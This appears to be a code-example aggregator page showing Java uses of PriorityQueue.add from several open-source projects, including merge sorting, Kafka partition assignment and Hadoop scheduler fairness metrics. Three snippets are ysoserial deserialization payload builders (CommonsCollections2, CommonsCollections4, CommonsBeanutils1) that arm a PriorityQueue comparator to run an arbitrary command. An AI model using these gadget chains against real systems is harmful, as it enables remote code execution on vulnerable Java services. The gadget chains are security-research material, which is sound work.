Example usage for java.util PriorityQueue add

List of usage examples for java.util PriorityQueue add

Introduction

In this page you can find the example usage for java.util PriorityQueue add.

Prototype

public boolean add(E e) 

Source Link

Document

Inserts the specified element into this priority queue.

Usage

From source file:org.pepstock.jem.ant.tasks.utilities.SortTask.java

/**
 * This merges a bunch of temporary flat files
 * //from   ww  w.ja v  a  2s  . c o  m
 * @param files
 * @param fileOutput 
 * @param cmp 
 * @param cs 
 * @param output file
 * @param Charset character set to use to load the strings
 * @return The number of lines sorted.
 * @throws IOException 
 */
public static int mergeSortedFiles(List<File> files, FileOutputStream fileOutput, final Comparator<String> cmp,
        Charset cs) throws IOException {
    PriorityQueue<BinaryFileBuffer> pq = new PriorityQueue<BinaryFileBuffer>(11,
            new Comparator<BinaryFileBuffer>() {
                public int compare(BinaryFileBuffer i, BinaryFileBuffer j) {
                    return cmp.compare(i.peek(), j.peek());
                }
            });
    for (File f : files) {
        BinaryFileBuffer bfb = new BinaryFileBuffer(f, cs);
        pq.add(bfb);
    }
    BufferedWriter fbw = new BufferedWriter(new OutputStreamWriter(fileOutput, cs));
    int rowcounter = 0;
    try {
        while (!pq.isEmpty()) {
            BinaryFileBuffer bfb = pq.poll();
            String r = bfb.pop();
            fbw.write(r);
            fbw.newLine();
            ++rowcounter;
            if (bfb.empty()) {
                bfb.getBufferReader().close();
                // we don't need you anymore
                boolean isDeleted = bfb.getOriginalfile().delete();
                if (!isDeleted) {
                    // nop
                }
            } else {
                // add it back
                pq.add(bfb);
            }
        }
    } finally {
        fbw.flush();
        fbw.close();
        for (BinaryFileBuffer bfb : pq) {
            bfb.close();
        }
    }
    return rowcounter;
}

From source file:com.uber.stream.kafka.mirrormaker.controller.core.IdealStateBuilder.java

public static IdealState buildCustomIdealStateFor(String topicName, int numTopicPartitions,
        PriorityQueue<InstanceTopicPartitionHolder> instanceToNumServingTopicPartitionMap) {

    final CustomModeISBuilder customModeIdealStateBuilder = new CustomModeISBuilder(topicName);

    customModeIdealStateBuilder.setStateModel(OnlineOfflineStateModel.name).setNumPartitions(numTopicPartitions)
            .setNumReplica(1).setMaxPartitionsPerNode(numTopicPartitions);

    for (int i = 0; i < numTopicPartitions; ++i) {
        InstanceTopicPartitionHolder liveInstance = instanceToNumServingTopicPartitionMap.poll();
        if (liveInstance != null) {
            customModeIdealStateBuilder.assignInstanceAndState(Integer.toString(i),
                    liveInstance.getInstanceName(), "ONLINE");
            liveInstance.addTopicPartition(new TopicPartition(topicName, i));
            instanceToNumServingTopicPartitionMap.add(liveInstance);
        }//www .j  av a2  s  . c o m
    }
    return customModeIdealStateBuilder.build();
}

From source file:com.uber.stream.kafka.mirrormaker.common.utils.HelixUtils.java

public static IdealState buildCustomIdealStateFor(String topicName, int numTopicPartitions,
        PriorityQueue<InstanceTopicPartitionHolder> instanceToNumServingTopicPartitionMap) {

    final CustomModeISBuilder customModeIdealStateBuilder = new CustomModeISBuilder(topicName);

    customModeIdealStateBuilder.setStateModel(OnlineOfflineStateModel.name).setNumPartitions(numTopicPartitions)
            .setNumReplica(1).setMaxPartitionsPerNode(numTopicPartitions);

    for (int i = 0; i < numTopicPartitions; ++i) {
        synchronized (instanceToNumServingTopicPartitionMap) {
            InstanceTopicPartitionHolder liveInstance = instanceToNumServingTopicPartitionMap.poll();
            customModeIdealStateBuilder.assignInstanceAndState(Integer.toString(i),
                    liveInstance.getInstanceName(), "ONLINE");
            liveInstance.addTopicPartition(new TopicPartition(topicName, i));
            instanceToNumServingTopicPartitionMap.add(liveInstance);
        }// w ww. j  a va 2s. co  m
    }
    return customModeIdealStateBuilder.build();
}

From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections4.java

public Queue<Object> getObject(final String command) throws Exception {
    Object templates = Gadgets.createTemplatesImpl(command);

    ConstantTransformer constant = new ConstantTransformer(String.class);

    // mock method name until armed
    Class[] paramTypes = new Class[] { String.class };
    Object[] args = new Object[] { "foo" };
    InstantiateTransformer instantiate = new InstantiateTransformer(paramTypes, args);

    // grab defensively copied arrays
    paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
    args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

    ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

    // create queue with numbers
    PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
    queue.add(1);
    queue.add(1);// w w  w. j a v a 2 s . co  m

    // swap in values to arm
    Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
    paramTypes[0] = Templates.class;
    args[0] = templates;

    return queue;
}

From source file:jenkins.security.security218.ysoserial.payloads.CommonsBeanutils1.java

public Object getObject(final String command) throws Exception {
    final Object templates = Gadgets.createTemplatesImpl(command);
    // mock method name until armed
    final BeanComparator comparator = new BeanComparator("lowestSetBit");

    // create queue with numbers and basic comparator
    final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
    // stub data for replacement later
    queue.add(new BigInteger("1"));
    queue.add(new BigInteger("1"));

    // switch method called by comparator
    Reflections.setFieldValue(comparator, "property", "outputProperties");

    // switch contents of queue
    final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
    queueArray[0] = templates;//from w  w  w.  j av a2  s.  com
    queueArray[1] = templates;

    return queue;
}

From source file:org.apache.hama.util.Files.java

/**
 * Merges k sequence files each of size n using knlog(k) merge algorithm.
 * @param  inputPath :the input directory which contains sorted sequence
 *                    files, that have to be merged.
 * @param  fs        :the filesystem/*  w  w  w .  jav  a 2  s .c om*/
 * @param outputPath :the path to the merged sorted sequence file.
 */
public static <KEY extends WritableComparable<? super KEY>, VALUE extends Writable> void merge(FileSystem fs,
        Path inputPath, Path outputPath, Class<KEY> keyClazz, Class<VALUE> valClazz) {

    Configuration conf = fs.getConf();

    PriorityQueue<KVPair<KEY, VALUE>> pq = new PriorityQueue<KVPair<KEY, VALUE>>();

    //Map from KeyValuePair to the split number to which it belongs.
    HashMap<KVPair<KEY, VALUE>, Integer> keySplitMap = new HashMap<KVPair<KEY, VALUE>, Integer>();

    FileStatus[] files;
    SequenceFile.Writer writer = null;
    SequenceFile.Reader reader[] = null;
    try {
        files = fs.listStatus(inputPath);
        reader = new SequenceFile.Reader[files.length];

        for (int i = 0; i < files.length; i++) {
            if (files[i].getLen() > 0) {
                reader[i] = new SequenceFile.Reader(fs, files[i].getPath(), conf);
                KEY key = ReflectionUtils.newInstance(keyClazz, new Object[0]);
                VALUE val = ReflectionUtils.newInstance(valClazz, new Object[0]);

                reader[i].next(key, val);
                KVPair<KEY, VALUE> kv = new KVPair<KEY, VALUE>(key, val);
                pq.add(kv);
                keySplitMap.put(kv, i);
            }
        }

        writer = SequenceFile.createWriter(fs, conf, outputPath, keyClazz, valClazz);

        while (!pq.isEmpty()) {
            KVPair<KEY, VALUE> smallestKey = pq.poll();
            writer.append(smallestKey.getKey(), smallestKey.getValue());
            Integer index = keySplitMap.get(smallestKey);
            keySplitMap.remove(smallestKey);

            KEY key = ReflectionUtils.newInstance(keyClazz, new Object[0]);
            VALUE val = ReflectionUtils.newInstance(valClazz, new Object[0]);

            if (reader[index].next(key, val)) {
                KVPair<KEY, VALUE> kv = new KVPair<KEY, VALUE>(key, val);
                pq.add(kv);
                keySplitMap.put(kv, index);
            }
        }

    } catch (IOException e) {
        LOG.error("Couldn't get status, exiting ...", e);
        System.exit(-1);
    } finally {
        if (writer != null) {
            try {
                writer.close();
            } catch (IOException e) {
                LOG.error("Cannot close writer to sorted seq. file. Exiting ...", e);
                System.exit(-1);
            }
        }
    }
}

From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections2.java

public Queue<Object> getObject(final String command) throws Exception {
    final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
    // mock method name until armed
    final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

    // create queue with numbers and basic comparator
    final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(transformer));
    // stub data for replacement later
    queue.add(1);
    queue.add(1);//from  w w  w  . j av  a2 s .  c o  m

    // switch method called by comparator
    Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

    // switch contents of queue
    final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
    queueArray[0] = templates;
    queueArray[1] = 1;

    return queue;
}

From source file:main.java.RMDupper.java

public static void queueOrOutput(DupStats dupStats, OccurenceCounterMerged occurenceCounterMerged,
        SAMFileWriter outputSam, Boolean allReadsAsMerged,
        PriorityQueue<ImmutableTriple<Integer, Integer, SAMRecord>> recordBuffer,
        PriorityQueue<ImmutableTriple<Integer, Integer, SAMRecord>> duplicateBuffer, Set<String> discardSet,
        SAMRecord curr) {//from w w  w.j  av a 2s  . co  m
    //Don't do anything with unmapped reads, just write them into the output!
    if (curr.getReadUnmappedFlag() || curr.getMappingQuality() == 0) {
        outputSam.addAlignment(curr);
    } else {
        if (recordBuffer.size() > 0 && recordBuffer.peek().middle < curr.getAlignmentStart()) {
            checkForDuplication(dupStats, occurenceCounterMerged, outputSam, allReadsAsMerged, recordBuffer,
                    duplicateBuffer, discardSet);
        }
        recordBuffer.add(new ImmutableTriple<Integer, Integer, SAMRecord>(curr.getAlignmentStart(),
                curr.getAlignmentEnd(), curr));
    }
}

From source file:org.apache.hadoop.mapred.PoolFairnessCalculator.java

/**
 * This method takes a list of {@link PoolMetadata} objects and calculates
 * fairness metrics of how well scheduling is doing.
 *
 * The goals of the fair scheduling are to insure that every pool is getting
 * an equal share.  The expected share of resources for each pool is
 * complicated by the pools not requiring an equal share
 * or pools that have a minimum or maximum allocation of resources.
 *
 * @param poolMetadataList List of all pool metadata
 * @param metricsRecord Where to write the metrics
 *///from w  w  w.  j ava 2  s  .  c  o m
public static void calculateFairness(final List<PoolMetadata> poolMetadataList,
        final MetricsRecord metricsRecord) {
    if (poolMetadataList == null || poolMetadataList.isEmpty()) {
        return;
    }

    // Find the total available usage and guaranteed resources by resource
    // type.  Add the resource metadata to the sorted set to schedule if
    // there is something to schedule (desiredAfterConstraints > 0)
    long startTime = System.currentTimeMillis();
    Map<String, TotalResourceMetadata> resourceTotalMap = new HashMap<String, TotalResourceMetadata>();
    Map<String, Set<ResourceMetadata>> resourceSchedulablePoolMap = new HashMap<String, Set<ResourceMetadata>>();
    for (PoolMetadata poolMetadata : poolMetadataList) {
        for (String resourceName : poolMetadata.getResourceMetadataKeys()) {
            ResourceMetadata resourceMetadata = poolMetadata.getResourceMetadata(resourceName);
            TotalResourceMetadata totalResourceMetadata = resourceTotalMap.get(resourceName);
            if (totalResourceMetadata == null) {
                totalResourceMetadata = new TotalResourceMetadata();
                resourceTotalMap.put(resourceName, totalResourceMetadata);
            }
            totalResourceMetadata.totalAvailable += resourceMetadata.getCurrentlyUsed();

            Set<ResourceMetadata> schedulablePoolSet = resourceSchedulablePoolMap.get(resourceName);
            if (schedulablePoolSet == null) {
                schedulablePoolSet = new HashSet<ResourceMetadata>();
                resourceSchedulablePoolMap.put(resourceName, schedulablePoolSet);
            }
            if (resourceMetadata.getDesiredAfterConstraints() > 0) {
                if (!schedulablePoolSet.add(resourceMetadata)) {
                    throw new RuntimeException(
                            "Duplicate resource metadata " + resourceMetadata + " in " + schedulablePoolSet);
                }
            }
        }
    }

    // First, allocate resources for all the min guaranteed resources
    // for the pools.  Ordering is done by the largest
    // min(min guaranteed, desired).
    GuaranteedDesiredComparator guarantedDesiredComparator = new GuaranteedDesiredComparator();
    List<ResourceMetadata> removePoolList = new ArrayList<ResourceMetadata>();
    for (Map.Entry<String, TotalResourceMetadata> entry : resourceTotalMap.entrySet()) {
        List<ResourceMetadata> resourceMetadataList = new ArrayList<ResourceMetadata>(
                resourceSchedulablePoolMap.get(entry.getKey()));
        TotalResourceMetadata totalResourceMetadata = entry.getValue();
        Collections.sort(resourceMetadataList, guarantedDesiredComparator);
        while ((totalResourceMetadata.totalAllocated < totalResourceMetadata.totalAvailable)
                && !resourceMetadataList.isEmpty()) {
            removePoolList.clear();
            for (ResourceMetadata resourceMetadata : resourceMetadataList) {
                if (resourceMetadata.getExpectedUsed() == resourceMetadata.getGuaranteedUsedAndDesired()) {
                    removePoolList.add(resourceMetadata);
                    continue;
                }
                resourceMetadata.incrExpectedUsed();
                ++totalResourceMetadata.totalAllocated;
            }
            resourceMetadataList.removeAll(removePoolList);
        }
        LOG.info("After allocating min guaranteed and desired - " + "Resource type " + entry.getKey()
                + " totalAvailable=" + totalResourceMetadata.totalAvailable + ", totalAllocated="
                + totalResourceMetadata.totalAllocated);
    }

    // At this point, all pools have been allocated their guaranteed used and
    // desired resources.  If there are any more resources to allocate, give
    // resources to lowest allocated pool that hasn't reached desired
    // until all the resources are gone
    ExpectedUsedComparator expectedUsedComparator = new ExpectedUsedComparator();
    PriorityQueue<ResourceMetadata> minHeap = new PriorityQueue<ResourceMetadata>(100, expectedUsedComparator);
    for (Map.Entry<String, TotalResourceMetadata> entry : resourceTotalMap.entrySet()) {
        minHeap.addAll(resourceSchedulablePoolMap.get(entry.getKey()));
        TotalResourceMetadata totalResourceMetadata = entry.getValue();
        while ((totalResourceMetadata.totalAllocated < totalResourceMetadata.totalAvailable)
                && !minHeap.isEmpty()) {
            ResourceMetadata resourceMetadata = minHeap.remove();
            if (resourceMetadata.getExpectedUsed() == resourceMetadata.getDesiredAfterConstraints()) {
                continue;
            }
            resourceMetadata.incrExpectedUsed();
            ++totalResourceMetadata.totalAllocated;
            minHeap.add(resourceMetadata);
        }
        minHeap.clear();
    }

    // Now calculate the difference of the expected allocation and the
    // actual allocation to get the following metrics.  When calculating
    // the percent bad allocated divide by 2 because the difference double
    // counts a bad allocation
    // 1) total tasks difference between expected and actual allocation
    //    0 is totally fair, higher is less fair
    // 2) % of tasks incorrectly allocated
    //    0 is totally fair, higher is less fair
    // 3) average difference per pool
    //    0 is totally fair, higher is less fair
    // 4) standard deviation per pool
    //    0 is totally fair, higher is less fair
    for (PoolMetadata poolMetadata : poolMetadataList) {
        for (String resourceName : poolMetadata.getResourceMetadataKeys()) {
            ResourceMetadata resourceMetadata = poolMetadata.getResourceMetadata(resourceName);
            int diff = Math.abs(resourceMetadata.getExpectedUsed() - resourceMetadata.getCurrentlyUsed());
            LOG.info("Pool " + poolMetadata.getPoolName() + ", resourceName=" + resourceName + ", expectedUsed="
                    + resourceMetadata.getExpectedUsed() + ", currentUsed="
                    + resourceMetadata.getCurrentlyUsed() + ", maxAllowed=" + resourceMetadata.getMaxAllowed()
                    + ", desiredAfterConstraints=" + resourceMetadata.getDesiredAfterConstraints()
                    + ", guaranteedUsedAndDesired=" + resourceMetadata.getGuaranteedUsedAndDesired() + ", diff="
                    + diff);
            resourceTotalMap.get(resourceName).totalFairnessDifference += diff;
            resourceTotalMap.get(resourceName).totalFairnessDifferenceSquared += diff * diff;
        }
    }
    TotalResourceMetadata allResourceMetadata = new TotalResourceMetadata();
    allResourceMetadata.resourceTypeCount = resourceTotalMap.size();
    for (TotalResourceMetadata totalResourceMetadata : resourceTotalMap.values()) {
        allResourceMetadata.totalAvailable += totalResourceMetadata.totalAvailable;
        allResourceMetadata.totalFairnessDifference += totalResourceMetadata.totalFairnessDifference;
        allResourceMetadata.totalFairnessDifferenceSquared += totalResourceMetadata.totalFairnessDifferenceSquared;
    }
    resourceTotalMap.put("all", allResourceMetadata);
    StringBuilder metricsBuilder = new StringBuilder();
    for (Map.Entry<String, TotalResourceMetadata> entry : resourceTotalMap.entrySet()) {
        TotalResourceMetadata totalResourceMetadata = entry.getValue();
        totalResourceMetadata.percentUnfair = (totalResourceMetadata.totalAvailable == 0) ? 0
                : totalResourceMetadata.totalFairnessDifference * 100f / 2
                        / totalResourceMetadata.totalAvailable;
        totalResourceMetadata.stdDevUnfair = (float) Math
                .sqrt((double) totalResourceMetadata.totalFairnessDifferenceSquared / poolMetadataList.size()
                        / totalResourceMetadata.resourceTypeCount);
        totalResourceMetadata.averageUnfairPerPool = (float) totalResourceMetadata.totalFairnessDifference
                / poolMetadataList.size() / totalResourceMetadata.resourceTypeCount;

        metricsRecord.setMetric(FAIRNESS_DIFFERENCE_COUNT_PREFIX + entry.getKey(),
                totalResourceMetadata.totalFairnessDifference);
        metricsBuilder.append(FAIRNESS_DIFFERENCE_COUNT_PREFIX + entry.getKey() + "="
                + totalResourceMetadata.totalFairnessDifference + "\n");
        metricsRecord.setMetric(FAIRNESS_PERCENT_UNFAIR_PREFIX + entry.getKey(),
                totalResourceMetadata.percentUnfair);
        metricsBuilder.append(FAIRNESS_PERCENT_UNFAIR_PREFIX + entry.getKey() + "="
                + totalResourceMetadata.percentUnfair + "\n");
        metricsRecord.setMetric(FAIRNESS_DIFFERENCE_PER_POOL_PREFIX + entry.getKey(),
                totalResourceMetadata.averageUnfairPerPool);
        metricsBuilder.append(FAIRNESS_DIFFERENCE_PER_POOL_PREFIX + entry.getKey() + "="
                + totalResourceMetadata.averageUnfairPerPool + "\n");
        metricsRecord.setMetric(FAIRNESS_UNFAIR_STD_DEV_PERFIX + entry.getKey(),
                totalResourceMetadata.stdDevUnfair);
        metricsBuilder.append(FAIRNESS_UNFAIR_STD_DEV_PERFIX + entry.getKey() + "="
                + totalResourceMetadata.stdDevUnfair + "\n");
        metricsBuilder.append(
                TOTAL_RESOURCES_PREFIX + entry.getKey() + "=" + totalResourceMetadata.totalAvailable + "\n");
    }

    if (LOG.isInfoEnabled()) {
        LOG.info("calculateFairness took " + (System.currentTimeMillis() - startTime) + " millisecond(s).");
    }
    if (LOG.isDebugEnabled()) {
        LOG.debug("\n" + metricsBuilder.toString());
    }
}

From source file:com.hortonworks.registries.schemaregistry.HAServerNotificationManager.java

private void notify(String urlPath, Object postBody) {
    // If Schema Registry was not started in HA mode then serverURL would be null, in case don't bother making POST calls
    if (serverUrl != null) {
        PriorityQueue<Pair<Integer, String>> queue = new PriorityQueue<>();
        synchronized (UPDATE_ITERATE_LOCK) {
            hostIps.stream().forEach(hostIp -> {
                queue.add(Pair.of(1, hostIp));
            });//from w w  w  . jav a 2s.co  m
        }

        while (!queue.isEmpty()) {
            Pair<Integer, String> priorityWithHostIp = queue.remove();

            WebTarget target = ClientBuilder.newClient()
                    .target(String.format("%s%s", priorityWithHostIp.getRight(), urlPath));
            Response response = null;

            try {
                response = target.request().post(Entity.json(postBody));
            } catch (Exception e) {
                LOG.warn("Failed to notify the peer server '{}' about the current host debut.",
                        priorityWithHostIp.getRight());
            }

            if ((response == null || response.getStatus() != Response.Status.OK.getStatusCode())
                    && priorityWithHostIp.getLeft() < MAX_RETRY) {
                queue.add(Pair.of(priorityWithHostIp.getLeft() + 1, priorityWithHostIp.getRight()));
            } else if (priorityWithHostIp.getLeft() < MAX_RETRY) {
                LOG.info("Notified the peer server '{}' about the current host debut.",
                        priorityWithHostIp.getRight());
            } else if (priorityWithHostIp.getLeft() >= MAX_RETRY) {
                LOG.warn(
                        "Failed to notify the peer server '{}' about the current host debut, giving up after {} attempts.",
                        priorityWithHostIp.getRight(), MAX_RETRY);
            }

            try {
                Thread.sleep(priorityWithHostIp.getLeft() * 100);
            } catch (InterruptedException e) {
                LOG.warn("Failed to notify the peer server '{}'", priorityWithHostIp.getRight(), e);
            }
        }

    }
}